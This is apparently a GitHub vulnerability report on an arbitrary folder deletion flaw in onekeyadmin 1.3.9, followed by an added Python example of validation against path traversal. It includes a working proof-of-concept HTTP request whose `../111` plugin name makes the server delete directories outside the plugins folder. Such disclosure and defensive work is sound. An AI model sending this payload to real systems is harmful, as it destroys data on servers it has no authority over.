
Background arbitrary folder deletion vulnerability #3

Open
qbz95aaa opened this issue Jan 10, 2023 · 1 comment

qbz95aaa commented Jan 10, 2023

Vulnerability affects product: onekeyadmin
Vulnerability affects version: 1.3.9
Vulnerability type: file delete
Vulnerability details:
Vulnerability location
The vulnerability occurs in the `app\admin\controller\plugins#delete` method
image
Here the `delDirAndFile` method of `onekey\File` is called
image
Vulnerability reproduction
Conditions: background administrator rights
Next I will delete the `E:\onekeyadmin-main\public\111\` directory
```http
POST /admin1/plugins/delete HTTP/1.1
Host: 192.168.3.129:8091
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.129:8091/admin1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0f1ac62d78a3647890cbd8acd3d458b7
Connection: close
Content-Length: 17
Content-Type: application/json

{"name":"../111"}
```
image
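The report shows a plugin name of `../111` reaching a recursive directory delete without any containment check. The following is an added example, not code from onekeyadmin, of the validation a defender would place in front of such a delete; the names `resolve_plugin_dir`, `delete_plugin` and `UnsafePluginName` are assumed, and the plugins directory path is passed in by the caller. It goes one step beyond the report by also catching a symlink inside the plugins directory that points outside it.

```python
import os
import shutil


class UnsafePluginName(ValueError):
    """Raised when a plugin name would escape the plugins directory."""


def resolve_plugin_dir(plugins_dir: str, name: str) -> str:
    """Return the absolute directory for plugin `name`, or raise.

    Two layers, both missing from the delete handler in the report:
    1. allow-list the name itself (no separators, no dot segments),
    2. resolve symlinks and `..`, then confirm the result is inside plugins_dir.
    """
    if not name or name in (".", "..") or "/" in name or "\\" in name:
        raise UnsafePluginName(f"rejected plugin name: {name!r}")
    if not all(c.isalnum() or c in "-_" for c in name):
        raise UnsafePluginName(f"rejected plugin name: {name!r}")
    base = os.path.realpath(plugins_dir)
    target = os.path.realpath(os.path.join(base, name))
    # commonpath (not startswith) also blocks prefix tricks such as /plugins vs /plugins2
    if target == base or os.path.commonpath([base, target]) != base:
        raise UnsafePluginName(f"path escapes plugins dir: {target}")
    return target


def delete_plugin(plugins_dir: str, name: str) -> bool:
    """Delete a plugin directory only after validation; True if something was removed."""
    target = resolve_plugin_dir(plugins_dir, name)
    if not os.path.isdir(target):
        return False
    shutil.rmtree(target)
    return True


if __name__ == "__main__":
    # Constructed input mirroring the report's payload; no filesystem change happens.
    try:
        resolve_plugin_dir("/srv/onekeyadmin/public/plugins", "../111")
    except UnsafePluginName as exc:
        print("blocked:", exc)
```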

qbz95aaa (Author) commented

Found by Chaitin Security Research Lab
